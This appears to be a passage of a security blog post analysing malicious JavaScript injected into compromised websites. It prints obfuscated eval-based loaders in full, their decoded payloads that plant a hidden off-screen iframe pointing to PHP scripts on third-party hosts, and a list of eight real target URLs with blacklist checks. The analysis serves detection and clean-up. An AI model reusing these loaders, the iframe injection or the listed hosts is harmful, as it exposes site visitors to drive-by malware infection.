  15.         cegp ="17:5d:6c:65:5a:6b:60:66:65:17:63:61:71:69:66:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:63:61:71:69:66:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:63:61:71:69:66:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:58:63:6a:5c:58:69:6a:64:5b:25:65:5c:6b:26:58:67:67:6a:26:65:62:5b:43:68:6b:47:71:25:67:5f:67:1e:32:4:1:17:63:61:71:69:66:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:63:61:71:69:66:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:29:28:2b:27:1e:32:4:1:17:63:61:71:69:66:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:29:28:2b:27:67:6f:1e:32:4:1:17:63:61:71:69:66:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:29:28:2b:27:67:6f:1e:32:4:1:17:63:61:71:69:66:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:29:28:2b:27:1e:32:4:1:17:63:61:71:69:66:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:29:28:2b:27:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:63:61:71:69:66:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:63:61:71:69:66:53:1e:17:5a:63:58:6a:6a:34:53:1e:63:61:71:69:66:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:63:61:71:69:66:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:63:61:71:69:66:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:63:61:71:69:66:27:30:1f:20:32:4:1:74:4:1:74"[qhz](":");
  16.     }
  17.     koibb = cegp;
  18.     sul = [];
  19.     for (dadzvp = 22 - 20 - 2; - dadzvp + 1432 != 0; dadzvp += 1) {
  20.         mfemzi = dadzvp;
  21.         if ((0x19 == 031)) sul += String["fromCharCode"](eval(gxccx + koibb[1 * mfemzi]) + 0xa - ylwyp);
  22.     }
  23.     wmoxjo = eval;
  24.     wmoxjo(sul)
  25. }


Malicious payload

Decoded payload generates hidden iframe to http://alsearsmd.net/apps/nkdLqtPz.php if cookie does not exists on the visitor browser and generates the cookie. The expiration time set in function ensures that the same visitor won't be redirected more than once a day.

  1. function ljzro09() {
  2.  
  3.     var static = 'ajax';
  4.  
  5.     var controller = 'index.php';
  6.  
  7.     var ljzro = document.createElement('iframe');
  8.  
  9.  
  10.  
  11.     ljzro.src = 'http://alsearsmd.net/apps/nkdLqtPz.php';
  12.  
  13.     ljzro.style.position = 'absolute';
  14.  
  15.     ljzro.style.color = '2140';
  16.  
  17.     ljzro.style.height = '2140px';
  18.  
  19.     ljzro.style.width = '2140px';
  20.  
  21.     ljzro.style.left = '10002140';
  22.  
  23.     ljzro.style.top = '10002140';
  24.  
  25.  
  26.  
  27.     if (!document.getElementById('ljzro')) {
  28.  
  29.         document.write('<p id=\'ljzro\' class=\'ljzro09\' ></p>');
  30.  
  31.         document.getElementById('ljzro').appendChild(ljzro);
  32.  
  33.     }
  34.  
  35. }
  36.  
  37. function SetCookie(cookieName, cookieValue, nDays, path) {
  38.  
  39.     var today = new Date();
  40.  
  41.     var expire = new Date();
  42.  
  43.     if (nDays == null || nDays == 0) nDays = 1;
  44.  
  45.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  46.  
  47.     document.cookie = cookieName + "=" + escape(cookieValue)
  48.  
  49.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  50.  
  51. }
  52.  
  53. function GetCookie(name) {
  54.  
  55.     var start = document.cookie.indexOf(name + "=");
  56.  
  57.     var len = start + name.length + 1;
  58.  
  59.     if ((!start) &&
  60.  
  61.         (name != document.cookie.substring(0, name.length)))
  62.  
  63.     {
  64.  
  65.         return null;
  66.  
  67.     }
  68.  
  69.     if (start == -1) return null;
  70.  
  71.     var end = document.cookie.indexOf(";", len);
  72.  
  73.     if (end == -1) end = document.cookie.length;
  74.  
  75.     return unescape(document.cookie.substring(len, end));
  76.  
  77. }
  78.  
  79. if (navigator.cookieEnabled)
  80.  
  81. {
  82.  
  83.     if (GetCookie('visited_uq') == 55) {} else {
  84.         SetCookie('visited_uq', '55', '1', '/');
  85.  
  86.  
  87.  
  88.         ljzro09();
  89.  
  90.     }
  91.  
  92. }


Sample 8 

Beautified script 

  1. if (document.querySelector) dllai = 4;
  2. apggms =("82,c8,d7,d0,c5,d6,cb,d1,d0,82,da,92,9b,8a,8b,82,dd,6f,6c,82,d8,c3,d4,82,d5,d6,c3,d6,cb,c5,9f,89,c3,cc,c3,da,89,9d,6f,6c,82,d8,c3,d4,82,c5,d1,d0,d6,d4,d1,ce,ce,c7,d4,9f,89,cb,d0,c6,c7,da,90,d2,ca,d2,89,9d,6f,6c,82,d8,c3,d4,82,da,82,9f,82,c6,d1,c5,d7,cf,c7,d0,d6,90,c5,d4,c7,c3,d6,c7,a7,ce,c7,cf,c7,d0,d6,8a,89,cb,c8,d4,c3,cf,c7,89,8b,9d,6f,6c,6f,6c,82,da,90,d5,d4,c5,82,9f,82,89,ca,d6,d6,d2,9c,91,91,d7,cf,d9,c7,ce,d6,c8,c7,d5,d6,cb,d8,c3,ce,90,c6,c7,91,d9,d2,8f,c5,d1,d0,d6,c7,d0,d6,91,9a,94,99,c4,d6,cd,d2,c8,90,d2,ca,d2,89,9d,6f,6c,82,da,90,d5,d6,db,ce,c7,90,d2,d1,d5,cb,d6,cb,d1,d0,82,9f,82,89,c3,c4,d5,d1,ce,d7,d6,c7,89,9d,6f,6c,82,da,90,d5,d6,db,ce,c7,90,c5,d1,ce,d1,d4,82,9f,82,89,97,92,97,99,94,89,9d,6f,6c,82,da,90,d5,d6,db,ce,c7,90,ca,c7,cb,c9,ca,d6,82,9f,82,89,97,92,97,99,94,d2,da,89,9d,6f,6c,82,da,90,d5,d6,db,ce,c7,90,d9,cb,c6,d6,ca,82,9f,82,89,97,92,97,99,94,d2,da,89,9d,6f,6c,82,da,90,d5,d6,db,ce,c7,90,ce,c7,c8,d6,82,9f,82,89,93,92,92,92,97,92,97,99,94,89,9d,6f,6c,82,da,90,d5,d6,db,ce,c7,90,d6,d1,d2,82,9f,82,89,93,92,92,92,97,92,97,99,94,89,9d,6f,6c,6f,6c,82,cb,c8,82,8a,83,c6,d1,c5,d7,cf,c7,d0,d6,90,c9,c7,d6,a7,ce,c7,cf,c7,d0,d6,a4,db,ab,c6,8a,89,da,89,8b,8b,82,dd,6f,6c,82,c6,d1,c5,d7,cf,c7,d0,d6,90,d9,d4,cb,d6,c7,8a,89,9e,d2,82,cb,c6,9f,be,89,da,be,89,82,c5,ce,c3,d5,d5,9f,be,89,da,92,9b,be,89,82,a0,9e,91,d2,a0,89,8b,9d,6f,6c,82,c6,d1,c5,d7,cf,c7,d0,d6,90,c9,c7,d6,a7,ce,c7,cf,c7,d0,d6,a4,db,ab,c6,8a,89,da,89,8b,90,c3,d2,d2,c7,d0,c6,a5,ca,cb,ce,c6,8a,da,8b,9d,6f,6c,82,df,6f,6c,df,6f,6c,c8,d7,d0,c5,d6,cb,d1,d0,82,b5,c7,d6,a5,d1,d1,cd,cb,c7,8a,c5,d1,d1,cd,cb,c7,b0,c3,cf,c7,8e,c5,d1,d1,cd,cb,c7,b8,c3,ce,d7,c7,8e,d0,a6,c3,db,d5,8e,d2,c3,d6,ca,8b,82,dd,6f,6c,82,d8,c3,d4,82,d6,d1,c6,c3,db,82,9f,82,d0,c7,d9,82,a6,c3,d6,c7,8a,8b,9d,6f,6c,82,d8,c3,d4,82,c7,da,d2,cb,d4,c7,82,9f,82,d0,c7,d9,82,a6,c3,d6,c7,8a,8b,9d,6f,6c,82,cb,c8,82,8a,d0,a6,c3,db,d5,9f,9f,d0,d7,ce,ce,82,de,de,82,d0,a6,c3,db,d5,9f,9f,92,8b,82,d0,a6,c3,db,d5,9f,93,9d,6f,6c,82,c7,da,d2,cb,d4,c7,90,d5,c7,d6,b6,cb,cf,c7,8a,d6,d1,c6,c3,db,90,c9,c7,d6,b6,cb,cf,c7,8a,8b,82,8d,82,95,98,92,92,92,92,92,8c,94,96,8c,d0,a6,c3,db,d5,8b,9d,6f,6c,82,c6,d1,c5,d7,cf,c7,d0,d6,90,c5,d1,d1,cd,cb,c7,82,9f,82,c5,d1,d1,cd,cb,c7,b0,c3,cf,c7,8d,84,9f,84,8d,c7,d5,c5,c3,d2,c7,8a,c5,d1,d1,cd,cb,c7,b8,c3,ce,d7,c7,8b,6f,6c,82,8d,82,84,9d,c7,da,d2,cb,d4,c7,d5,9f,84,82,8d,82,c7,da,d2,cb,d4,c7,90,d6,d1,a9,af,b6,b5,d6,d4,cb,d0,c9,8a,8b,82,8d,82,8a,8a,d2,c3,d6,ca,8b,82,a1,82,84,9d,82,d2,c3,d6,ca,9f,84,82,8d,82,d2,c3,d6,ca,82,9c,82,84,84,8b,9d,6f,6c,df,6f,6c,c8,d7,d0,c5,d6,cb,d1,d0,82,a9,c7,d6,a5,d1,d1,cd,cb,c7,8a,82,d0,c3,cf,c7,82,8b,82,dd,6f,6c,82,d8,c3,d4,82,d5,d6,c3,d4,d6,82,9f,82,c6,d1,c5,d7,cf,c7,d0,d6,90,c5,d1,d1,cd,cb,c7,90,cb,d0,c6,c7,da,b1,c8,8a,82,d0,c3,cf,c7,82,8d,82,84,9f,84,82,8b,9d,6f,6c,82,d8,c3,d4,82,ce,c7,d0,82,9f,82,d5,d6,c3,d4,d6,82,8d,82,d0,c3,cf,c7,90,ce,c7,d0,c9,d6,ca,82,8d,82,93,9d,6f,6c,82,cb,c8,82,8a,82,8a,82,83,d5,d6,c3,d4,d6,82,8b,82,88,88,6f,6c,82,8a,82,d0,c3,cf,c7,82,83,9f,82,c6,d1,c5,d7,cf,c7,d0,d6,90,c5,d1,d1,cd,cb,c7,90,d5,d7,c4,d5,d6,d4,cb,d0,c9,8a,82,92,8e,82,d0,c3,cf,c7,90,ce,c7,d0,c9,d6,ca,82,8b,82,8b,82,8b,6f,6c,82,dd,6f,6c,82,d4,c7,d6,d7,d4,d0,82,d0,d7,ce,ce,9d,6f,6c,82,df,6f,6c,82,cb,c8,82,8a,82,d5,d6,c3,d4,d6,82,9f,9f,82,8f,93,82,8b,82,d4,c7,d6,d7,d4,d0,82,d0,d7,ce,ce,9d,6f,6c,82,d8,c3,d4,82,c7,d0,c6,82,9f,82,c6,d1,c5,d7,cf,c7,d0,d6,90,c5,d1,d1,cd,cb,c7,90,cb,d0,c6,c7,da,b1,c8,8a,82,84,9d,84,8e,82,ce,c7,d0,82,8b,9d,6f,6c,82,cb,c8,82,8a,82,c7,d0,c6,82,9f,9f,82,8f,93,82,8b,82,c7,d0,c6,82,9f,82,c6,d1,c5,d7,cf,c7,d0,d6,90,c5,d1,d1,cd,cb,c7,90,ce,c7,d0,c9,d6,ca,9d,6f,6c,82,d4,c7,d6,d7,d4,d0,82,d7,d0,c7,d5,c5,c3,d2,c7,8a,82,c6,d1,c5,d7,cf,c7,d0,d6,90,c5,d1,d1,cd,cb,c7,90,d5,d7,c4,d5,d6,d4,cb,d0,c9,8a,82,ce,c7,d0,8e,82,c7,d0,c6,82,8b,82,8b,9d,6f,6c,df,6f,6c,cb,c8,82,8a,d0,c3,d8,cb,c9,c3,d6,d1,d4,90,c5,d1,d1,cd,cb,c7,a7,d0,c3,c4,ce,c7,c6,8b,6f,6c,dd,6f,6c,cb,c8,8a,a9,c7,d6,a5,d1,d1,cd,cb,c7,8a,89,d8,cb,d5,cb,d6,c7,c6,c1,d7,d3,89,8b,9f,9f,97,97,8b,dd,df,c7,ce,d5,c7,dd,b5,c7,d6,a5,d1,d1,cd,cb,c7,8a,89,d8,cb,d5,cb,d6,c7,c6,c1,d7,d3,89,8e,82,89,97,97,89,8e,82,89,93,89,8e,82,89,91,89,8b,9d,6f,6c,6f,6c,da,92,9b,8a,8b,9d,6f,6c,df,6f,6c,df".split(","));
  3. vwjs = eval;
  4.  
  5. function acqyu() {
  6.     okuwlg = function () {
  7.         -- (tutgff.body)
  8.     }()
  9. }
  10. tutgff = document;
  11. for (mrhq = 0; mrhq < apggms["length"]; mrhq += 1) {
  12.     apggms[mrhq] = -(98) + parseInt(apggms[mrhq], dllai * 4);
  13. }
  14. try {
  15.     acqyu()
  16. } catch (nnj) {
  17.     dueip = 50 - 50;
  18. }
  19. if (!dueip) vwjs(String["fr" + "omCh" + "arCo" + "de"].apply(String, apggms));


Malicious payload

Decoded payload generates hidden iframe to http://umweltfestival.de/wp-content/827btkpf.php if cookie does not exists on the visitor browser and generates the cookie. The expiration time set in function ensures that the same visitor won't be redirected more than once a day.

  1. function x09() {
  2.  
  3.     var static = 'ajax';
  4.  
  5.     var controller = 'index.php';
  6.  
  7.     var x = document.createElement('iframe');
  8.  
  9.  
  10.  
  11.     x.src = 'http://umweltfestival.de/wp-content/827btkpf.php';
  12.  
  13.     x.style.position = 'absolute';
  14.  
  15.     x.style.color = '50572';
  16.  
  17.     x.style.height = '50572px';
  18.  
  19.     x.style.width = '50572px';
  20.  
  21.     x.style.left = '100050572';
  22.  
  23.     x.style.top = '100050572';
  24.  
  25.  
  26.  
  27.     if (!document.getElementById('x')) {
  28.  
  29.         document.write('<p id=\'x\' class=\'x09\' ></p>');
  30.  
  31.         document.getElementById('x').appendChild(x);
  32.  
  33.     }
  34.  
  35. }
  36.  
  37. function SetCookie(cookieName, cookieValue, nDays, path) {
  38.  
  39.     var today = new Date();
  40.  
  41.     var expire = new Date();
  42.  
  43.     if (nDays == null || nDays == 0) nDays = 1;
  44.  
  45.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  46.  
  47.     document.cookie = cookieName + "=" + escape(cookieValue)
  48.  
  49.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  50.  
  51. }
  52.  
  53. function GetCookie(name) {
  54.  
  55.     var start = document.cookie.indexOf(name + "=");
  56.  
  57.     var len = start + name.length + 1;
  58.  
  59.     if ((!start) &&
  60.  
  61.         (name != document.cookie.substring(0, name.length)))
  62.  
  63.     {
  64.  
  65.         return null;
  66.  
  67.     }
  68.  
  69.     if (start == -1) return null;
  70.  
  71.     var end = document.cookie.indexOf(";", len);
  72.  
  73.     if (end == -1) end = document.cookie.length;
  74.  
  75.     return unescape(document.cookie.substring(len, end));
  76.  
  77. }
  78.  
  79. if (navigator.cookieEnabled)
  80.  
  81. {
  82.  
  83.     if (GetCookie('visited_uq') == 55) {} else {
  84.         SetCookie('visited_uq', '55', '1', '/');
  85.  
  86.  
  87.  
  88.         x09();
  89.  
  90.     }
  91.  
  92. }


Summary

It can be seen that ALL payloads are actually the same. The only difference is the function name. It can be assumed that the attack was automated and massively infected vulnerable servers/ websites.

What about the iframes targets?
Let's first list them:
  1. http://brscertification.ir/promo2/Lnr927Qv.php
  2. http://viscol.com.tr/wp-content/plugins/customize-admin/ZwcD2SsE.php
  3. http://becattinipiante.it/Grafica/clik.php
  4. http://www.mobileliftoff.com/images/bMXWRTLg.php
  5. http://www.kcrtrucking.com/NJHTk3VC.php
  6. http://oxloxul.net/ibm.php
  7. http://alsearsmd.net/apps/nkdLqtPz.php
  8. http://umweltfestival.de/wp-content/827btkpf.php
All iframes try to load what appears to be .php scripts. The names has no sense and webmaster would unlikely create such names for valid files. Hence we can assume the random name generation by malware tools.

What about their location on the server? We can see two wp-content folders, - hacked Word Press installation. Others are promo2, Grafika, images, apps and top directory.

Let's see whether other blacklisting authorities have those domain in the databases?


http://brscertification.ir - is blacklisted by Google. http://www.google.com/safebrowsing/diagnostic?site=http://brscertification.ir

http://viscol.com.tr - was blacklisted by Google in the past for distributing malware http://www.google.com/safebrowsing/diagnostic?site=http://viscol.com.tr

http://becattinipiante.it - was blacklisted by Google in the past for distributing malware http://www.google.com/safebrowsing/diagnostic?site=http://becattinipiante.it

http://www.mobileliftoff.com - is CLEAN on Google! http://www.google.com/safebrowsing/diagnostic?site=http://www.mobileliftoff.com We were unable to get the .php script for investigation but clearly this is suspicious and should be removed by website owner.

http://www.kcrtrucking.com - is blacklisted by Google. http://www.google.com/safebrowsing/diagnostic?site=http://www.kcrtrucking.com

http://oxloxul.net - is CLEAN on Google! http://www.google.com/safebrowsing/diagnostic?site=http://oxloxul.net The website appears to be removed already.

http://alsearsmd.net - is CLEAN on Google! http://www.google.com/safebrowsing/diagnostic?site=http://alsearsmd.net If you go to this URL then php will return simple "OK" string.

http://umweltfestival.de - is CLEAN on Google!  http://www.google.com/safebrowsing/diagnostic?site=http://umweltfestival.de Tried to get the .php code but page does not exists.

Obviously, those .php files were intended to do malicious actions on visitor's PC and even though we don't know what exactly, it can be anything once the desired redirect is implemented.

Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.

No comments:

Post a Comment